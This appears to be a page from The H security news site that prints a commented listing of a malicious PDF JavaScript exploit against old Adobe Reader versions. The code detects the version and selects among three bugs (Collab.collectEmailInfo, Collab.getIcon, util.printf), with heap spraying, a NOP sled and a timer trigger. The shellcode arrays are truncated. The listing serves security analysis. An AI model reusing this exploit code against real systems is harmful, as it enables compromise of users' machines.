In association with heise online

A commented listing of the exploit

The code in this listing may cause your anti-virus scanner to issue an alert – this is a false alarm.

var t98Sd1ma7 = new Array();
var gh4Xf51rN;
// Prepare the Heap Spraying
function jytghWfFit(yYGbAXsdzD, hTfjUKHViV){
while(yYGbAXsdzD.length * 2 < hTfjUKHViV){
yYGbAXsdzD += yYGbAXsdzD;
}
yYGbAXsdzD = yYGbAXsdzD.substring(0, hTfjUKHViV / 2);
return yYGbAXsdzD;
}
// Choose shellcode and create Nop sled
functionkdNO4K43(kJSzl5v6vo){
if(kJSzl5v6vo == 0){
var kujFF0yXr = 0x0c0c0c0c;
var wly56uG4w = new Array("%u535","0%u525","1%u5756%u9",
[...],"03d%u","9000");
}
else if(kJSzl5v6vo == 1){
kujFF0yXr = 0x30303030;
var wly56uG4w = new Array("%u5350","%u5251%u","5756%u9c5",
[...],"u313d%u900","0");
}
else if(kJSzl5v6vo == 2){
var wly56uG4w = new Array("%u5350%u52","51%u5756","%u9c55%u",
[...],"%u6469%u3","23d%u9000");
}
    // Assemble the shellcode -> wly56uG4w
wly56uG4w = unescape(wly56uG4w.join(""));
   var lQ7jYN7Ee = 0x400000;
var l7UWARF9Z = wly56uG4w.length * 2;
var hTfjUKHViV = lQ7jYN7Ee - (l7UWARF9Z + 0x38);
// NOP commands
var yYGbAXsdzD = unescape("%u9090%u9090");
    // Create the sled
yYGbAXsdzD = jytghWfFit(yYGbAXsdzD, hTfjUKHViV);
   var vwd0fuUcVE = (kujFF0yXr - 0x400000) / lQ7jYN7Ee;
    // ... and add the shellcode
for(var ylXB738Q = 0; ylXB738Q < vwd0fuUcVE; ylXB738Q++){
t98Sd1ma7[ylXB738Q] = yYGbAXsdzD + wly56uG4w;
}
}
// Decide which exploit to use
function a6Omhe8Jq(){
var facAHEjvfd = 0;
// get version of Adobe Reader
var waNWb0AX4 = app.viewerVersion.toString();
app.clearTimeOut(gh4Xf51rN);
if((waNWb0AX4 >= 8 && waNWb0AX4 < 8.102) || waNWb0AX4 < 7.1){
// Exploit 1: Collab.collectEmailInfo Overflow
kdNO4K43(0);
// The nop sled is near 0x0c0c0c0c
var m5r7RwwLp = unescape("%u0c0c%u0c0c");
while(m5r7RwwLp.length < 44952) m5r7RwwLp += m5r7RwwLp;
       // Prepare the exploit
var oWdCzbRki = this;
var wHOvDN3CA = Collab;
oWdCzbRki["collabStore"] =
wHOvDN3CA["collectEmailInfo"]({subj : "", msg : m5r7RwwLp});
   } if((waNWb0AX4 >= 8.102 && waNWb0AX4 < 8.104) ||
(waNWb0AX4 >= 9 && waNWb0AX4 < 9.1) ||
waNWb0AX4 <= 7.101 ){
try{
if(app.doc.Collab.getIcon){
// Exploit 2: Collab.getIcon
kdNO4K43(2);
// Prepare the exploit
var bDA4BU6bV = unescape("%09");
while(bDA4BU6bV.length < 0x4000){bDA4BU6bV += bDA4BU6bV;}
bDA4BU6bV = "N." + bDA4BU6bV;
           // Call the vulnerable function
var vkQkwqXx = app;
vkQkwqXx["doc"]["Collab"]["getIcon"](bDA4BU6bV);
facAHEjvfd = 1;
} else{facAHEjvfd = 1;}
} catch(e){facAHEjvfd = 1;}
if(facAHEjvfd == 1){
if(waNWb0AX4 == 8.102 || waNWb0AX4 == 7.1){
// Exploit 3: util.printf
kdNO4K43(1);
// prepare exploit
var ogW2Dea1i = "12999999999999999999";
for(fqwUwehjt = 0; fqwUwehjt < 276; fqwUwehjt++){
ogW2Dea1i += "8";
}
// Call the vulnerable function
var tEODTfxDJ = util;tEODTfxDJ["printf"]("%45000f", ogW2Dea1i);}
       }
}
}
// Set up the time bomb that triggers the exploits
app.jTSCccXdL = a6Omhe8Jq;
gh4Xf51rN = app.setTimeOut("app.jTSCccXdL()", 10);
Print Version | Permalink: http://h-online.com/-1038864
  • Twitter
  • Facebook
  • submit to slashdot
  • StumbleUpon
  • submit to reddit
 


  • July's Community Calendar





The H Open

The H Security

The H Developer

The H Internet Toolkit